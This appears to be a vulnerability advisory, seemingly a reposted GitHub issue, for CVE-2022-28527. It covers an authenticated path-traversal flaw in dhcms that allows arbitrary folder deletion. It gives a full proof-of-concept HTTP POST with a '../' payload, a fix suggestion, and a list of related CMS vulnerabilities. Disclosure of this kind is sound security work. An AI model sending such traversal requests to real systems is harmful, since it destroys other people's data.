Headline
CVE-2022-28527: There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del · Issue #5 · ShaoGongBra/dhcms
dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del.
Vulnerability file: \framework\ext\Util.php
You can see that the following code does not filter …/ or …\, it just filters . or …, which will cause any folder to be deleted
Vulnerability to reproduce:
1、Log in to the backend first
2、Construct the packet as follows:
…
POST /admin.php?r=admin/AdminBackup/del HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.xxx.com/admin.php?r=admin/AdminBackup/index
Content-Length: 20
Cookie: PHPSESSID=prukpjkatj61ivpcp5lh976ok4
DNT: 1
Connection: close
data=…/111
…
You can see that the page shows that the file was deleted successfully
Repair suggestion:
filter …/ or …\
Related news
HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete.
GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=.
ZCMS v20170206 was discovered to contain a stored cross-site scripting (XSS) vulnerability via index.php?m=home&c=message&a=add.
bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?mode=content&page=media&action=edit.
ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config.
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.